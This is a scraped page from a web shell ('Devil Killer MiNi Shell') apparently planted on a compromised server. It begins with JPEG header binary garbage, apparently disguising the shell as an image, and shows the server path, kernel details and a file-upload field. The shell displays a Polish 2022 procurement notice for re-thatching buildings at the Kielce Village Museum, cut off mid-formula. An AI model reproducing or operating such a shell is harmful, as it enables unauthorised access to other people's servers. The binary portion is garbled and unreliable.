JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220614/0020887301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont pokrycia dachowego wykonanego ze słomy w obiektach Muzeum Wsi Kieleckiej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM WSI KIELECKIEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000659785</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Pawła II 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kielce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">25-025</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41 344 92 97 wew. 111</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@mwk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mwk.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont pokrycia dachowego wykonanego ze słomy w obiektach Muzeum Wsi Kieleckiej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1d48bd32-eba5-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00208873</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00053448/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Remont pokrycia dachowego wykonanego ze słomy w obiektach Muzeum Wsi Kieleckiej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl, https://epuap.gov/wps/portal, poczta elektroniczna: zp@mwk.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/ , ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej Zamawiającego: zp@mwk.com.pl<br/>2. W celu korzystania z systemu miniportal konieczne jest dysponowanie przez użytkownika urządzeniem teleinformatycznym z<br/>dostępem do sieci Internet. Aplikacja działa na Platformie Windows, Mac i Linux.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: ,,Formularza do złożenia, zmiany, wycofania oferty lub wniosku”<br/>oraz do ,,Formularza do komunikacji”.<br/>UWAGA: elektroniczne podpisanie przez Wykonawcę samego formularza nie jest równoznaczne<br/>z podpisaniem oferty. Brak podpisania w wymagany przez Zamawiającego sposób samej oferty, będzie skutkowało jej odrzuceniem.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu,<br/>opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej ePUAP.<br/>5. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>miniPortalu, określone w Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego<br/>regulaminu.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: Formularz do złożenia, zmmiany,<br/>wycofania oferty lub wniosku oraz do Formularza do komunikacji wynosi 150 MB.<br/>7. Za datę przekazania oferty, oświadczeń, o którym mowa w art. 125 ust. 1 Pzp, podmiotowych środków dowodowych oraz innych<br/>informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>8. W postępowaniu o udzielenie zamówienia korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty)<br/>odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana.<br/>9. Korespondencja elektroniczna (inna niż oferta Wykonawcy i załączniki do oferty) może również odbywać się elektronicznie za<br/>pośrednictwam e-mail: zp@mwk.com.pl . Wykonawca jest zobowiązany podać w Formularzu oferty (Załącznik Nr 1 do SWZ) adres<br/>e-mail, z wykorzystaniem którego prowadzona będzie korespondencja związana z postępowaniem.<br/>Zamawiajacy rekomenduje składanie dokumentów elektronicznych, innych niż oferta i załączone do niej dokumenty, za pomocą<br/>poczty elektronicznej: zp@mwk.com.pl<br/>Maksymalny rozmiar wiadomości przesyłanej za pomocą poczty elektronicznej wynosi 20 MB.<br/>10. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>postępowania MWK.DIZ.271.7.2022.<br/>11. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcą w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.<br/>12. Zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .docx, .rtf, .xps, .odt ze szczególnym wskazaniem na .pdf. W<br/>celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie formatu .zip, .7Z.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) Administratorem Pani/Pana danych osobowych jest Muzeum Wsi Kieleckiej w Kielcach<br/>b) Inspektorem Ochrony Danych Osobowych w Muzeum jest Pani Anna Rubinkiewicz, tel. 41 344 92 97 wew. 114, kom. 602 779<br/>754; e-mail: odo@mwk.com.pl, abcrodo@onet.pl<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek<br/>prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na Zamawiającym;<br/>d) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>f) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>g) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h) Posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych1;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO2;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i) Nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>2. Ponadto Zamawiający informuje, że Wykonawca ubiegając się o udzielenie niniejszego zamówienia publicznego jest zobowiązany<br/>do wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą m.in. obowiązki wynikające z RODO, w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał. Jednakże obowiązek<br/>informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane<br/>dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust. 4).<br/>Ponadto Wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje Zamawiającemu i których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.<br/>3. Wykonawca jest zobowiązany do złożenia w formularzu ofertowym (załącznik nr 1 do SWZ) oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MWK.DIZ.271.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia pn. „Remont pokrycia dachowego wykonanego ze słomy w obiektach Muzeum Wsi Kieleckiej”<br/>jest wykonanie robót polegających na wymianie strzechy słomianej na następujących obiektach znajdujących się na<br/>ekspozycji skansenowskiej w Parku Etnograficznym w Tokarni:<br/>1) Stodoła z Brzezin;<br/>2) Chałupa z Słupi Starej;<br/>3) Chałupa z Kobylnik;<br/>4) Chałupa ze Świątnik;<br/>5) Stodoła z Radkowic w sektorze dworsko-folwarcznym;<br/>6) Zagroda ze Szczepanowic.<br/>2. Zakres prac obejmuje w szczególności:<br/>1) Stodoła z Brzezin – wymianie podlega całość strzechy;<br/>a) demontaż kalenic;<br/>b) rozebranie istniejącego pokrycia dachu wraz z utylizacją materiału z rozbiórki;<br/>c) zabezpieczenie obiektu przed wpływem czynników atmosferycznych na czas wymiany pokrycia dachu;<br/>d) oczyszczenie oraz impregnacja łat drewnianych oraz elementów więźby dachowej preparatem zabezpieczającym przed<br/>szkodliwym działaniem owadów, grzybów domowych i pleśniowych;<br/>e) ułożenie strzechy ze słomy żytniej powiązanej w wykrętki na powierzchni około 170 m2 i grubości pokrycia min. 40 cm,<br/>krycie na gładko;<br/>f) montaż kalenic;<br/>g) po zakończonych robotach doprowadzenie terenu budowy do należytego stanu i porządku;<br/>2) Chałupa z Słupi Starej – wymianie podlega całość strzechy;<br/>a) demontaż kalenic;<br/>b) rozebranie istniejącego pokrycia dachu wraz z utylizacją materiału z rozbiórki;c) zabezpieczenie obiektu przed wpływem czynników atmosferycznych na czas wymiany pokrycia dachu;<br/>d) oczyszczenie oraz impregnacja łat drewnianych oraz elementów więźby dachowej preparatem zabezpieczającym przed<br/>szkodliwym działaniem owadów, grzybów domowych i pleśniowych;<br/>e) ułożenie strzechy ze słomy żytniej powiązanej w wykrętki na powierzchni około 120 m2 i grubości pokrycia min. 40 cm,<br/>krycie na gładko naroża schodkowo;<br/>f) montaż kalenic;<br/>g) po zakończonych robotach doprowadzenie terenu budowy do należytego stanu i porządku;<br/>3) Chałupa z Kobylnik – wymianie podlega całość strzechy;<br/>a) demontaż kalenic;<br/>b) rozebranie istniejącego pokrycia dachu wraz z utylizacją materiału z rozbiórki;<br/>c) zabezpieczenie obiektu przed wpływem czynników atmosferycznych na czas wymiany pokrycia dachu;<br/>d) oczyszczenie oraz impregnacja łat drewnianych oraz elementów więźby dachowej preparatem zabezpieczającym przed<br/>szkodliwym działaniem owadów, grzybów domowych i pleśniowych;<br/>e) ułożenie strzechy ze słomy żytniej powiązanej w wykrętki na powierzchni około 154 m2 i grubości pokrycia min. 40 cm,<br/>krycie na gładko;<br/>f) montaż kalenic;<br/>g) po zakończonych robotach doprowadzenie terenu budowy do należytego stanu i porządku;<br/>4) Chałupa ze Świątnik – wymianie podlega część strzechy – połać od strony północnej;<br/>a) demontaż kalenic;<br/>b) rozebranie części istniejącego pokrycia dachu wraz z utylizacją materiału z rozbiórki;<br/>c) zabezpieczenie obiektu przed wpływem czynników atmosferycznych na czas wymiany pokrycia dachu;<br/>d) oczyszczenie oraz impregnacja łat drewnianych oraz elementów więźby dachowej preparatem zabezpieczającym przed<br/>szkodliwym działaniem owadów, grzybów domowych i pleśniowych;<br/>e) ułożenie strzechy ze słomy żytniej powiązanej w wykrętki na powierzchni około 72 m2 i grubości pokrycia min. 40 cm,<br/>krycie na gładko naroża schodkowo;<br/>f) montaż kalenic;<br/>g) po zakończonych robotach doprowadzenie terenu budowy do należytego stanu i porządku;<br/>5) Stodoła z Radkowic w sektorze dworsko-folwarcznym – wymianie podlega część strzechy – połać dachowa od strony<br/>lasu;<br/>a) demontaż kalenic;<br/>b) rozebranie części istniejącego pokrycia dachu wraz z utylizacją materiału z rozbiórki;<br/>c) zabezpieczenie obiektu przed wpływem czynników atmosferycznych na czas wymiany pokrycia dachu;<br/>d) oczyszczenie oraz impregnacja łat drewnianych oraz elementów więźby dachowej preparatem zabezpieczającym przed<br/>szkodliwym działaniem owadów, grzybów domowych i pleśniowych;<br/>e) ułożenie strzechy ze słomy żytniej powiązanej w wykrętki na powierzchni około 254 m2 i grubości pokrycia min. 40 cm,<br/>krycie na gładko;<br/>f) montaż kalenic;<br/>g) po zakończonych robotach doprowadzenie terenu budowy do należytego stanu i porządku;<br/>6) Zagroda ze Szczepanowic – wymianie podlega całość strzechy;<br/>a) demontaż kalenic;<br/>b) rozebranie istniejącego pokrycia dachu wraz z utylizacją materiału z rozbiórki;<br/>c) zabezpieczenie obiektu przed wpływem czynników atmosferycznych na czas wymiany pokrycia dachu;<br/>d) oczyszczenie oraz impregnacja łat drewnianych oraz elementów więźby dachowej preparatem zabezpieczającym przed<br/>szkodliwym działaniem owadów, grzybów domowych i pleśniowych;<br/>e) ułożenie strzechy ze słomy żytniej powiązanej w wykrętki na powierzchni około 480 m2 i grubości pokrycia min. 40 cm,<br/>krycie na gładko naroża schodkowo;<br/>f) montaż kalenic;<br/>g) po zakończonych robotach doprowadzenie terenu budowy do należytego stanu i porządku;<br/>3. Dokumentację obiektów stanowi Załącznik nr 9 do SWZ na którą składają się: mapa sytuacyjna, program prac<br/>konserwatorskich i robót budowlanych, dokumentacja fotograficzna, karty inwentarzowe obiektów oraz rzuty i przekroje<br/>obiektów.<br/>Zgodnie z § 4 ust. 3 Rozporządzenia Ministra Rozwoju i Technologii z dnia 29 grudnia 2021 r. w sprawie szczegółowego<br/>zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu<br/>funkcjonalno-użytkowego, z uwagi na fakt, iż w projektowanych postanowieniach umowy przyjęto zasadę wynagrodzenia<br/>ryczałtowego załączona dokumentacja nie obejmuje przedmiaru robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp,<br/>w okresie 3 lat od dnia udzielenia zamówienia podstawowego:<br/>1) zamówienia te polegać będą na powtórzeniu robót zgodnych z zakresem robót stanowiących przedmiot niniejszego zamówienia<br/>(wymiana strzechy).<br/>2) zamówienia będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie<br/>zamówienia z wolnej ręki, a jeżeli wartość szacunkowa będzie mniejsza od kwoty określonej w art. 2 ust. 1 pkt 1 ustawy Pzp tylko po<br/>przeprowadzeniu negocjacji.<br/>3) zakres rzeczowy robót stanowiących przedmiot zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp nie przekroczy 15%<br/>wartości niniejszego zamówienia.<br/>4) zamówienia będą związane technologicznie, funkcjonalnie lub użytkowo z zamówieniem podstawowym; możliwość udzielenia<br/>zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp jest jedynie prawem Zamawiającego – nie stanowi żadnego<br/>wiążącego zobowiązania.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu.<br/>2. W celu wyboru najkorzystniejszej oferty Zamawiający przyjął następujące kryteria:<br/>cena (C) – 60%, gdzie 1% = 1pkt<br/>okres gwarancji (G) – 40%, gdzie 1% = 1 pkt<br/>2.1. Zasady oceny kryterium „cena” (C) – maksymalnie 60 pkt<br/>Ilość punktów dla każdej oferty zostanie ustalona wg poniższego wzoru:<br/> C min.<br/>C = ______ x 60 [pkt]<br/> C bad.<br/>gdzie:<br/>C – liczba punktów badanej oferty,<br/>Cmin. – najniższa cena wypływająca z ważnych ofert,<br/>Cbad. – cena oferty badanej.<br/>2.2. Zasady oceny kryterium „okres gwarancji” (G) – maksymalnie 40 pkt.<br/>Ocenie zostanie poddany okres gwarancji zaoferowany przez Wykonawcę w Formularzu oferty. Minimalny okres gwarancji został<br/>wskazany w Rozdziale IV ust. 2 SWZ i wynosi 36 miesięcy.<br/>Punkty zostaną przyznane wg następujących zasad:<br/>a) zaoferowanie gwarancji na okres 36 m-cy – 0 pkt<br/>b) zaoferowanie gwarancji na okres 48 m-cy – 20 pkt<br/>c) zaoferowanie gwarancji na okres 60 m-cy – 40 pkt<br/>Uwaga! Jeżeli Wykonawca w formularzu oferty nie wskaże żadnego okresu gwarancji lub zaznaczy kilka opcji Zamawiający uzna, że<br/>Wykonawca oferuje 36 miesięczny okres gwarancji i otrzyma w tym kryterium<br/>0 pkt. Wpisanie okresu dłuższego niż 60 m-cy nie spowoduje przyznania większej ilości punktów – Wykonawca otrzyma<br/>maksymalnie 40 pkt<br/>3. Zamawiający za najkorzystniejszą (N) uzna ofertę, która nie podlega odrzuceniu i uzyska największą łączną liczbę punktów<br/>uzyskaną ze wszystkich kryteriów. Największa liczba punktów, jaką można uzyskać to 100. Ocena będzie dokonana z dokładnością<br/>do dwóch miejsc po przecinku.<br/>N = C + 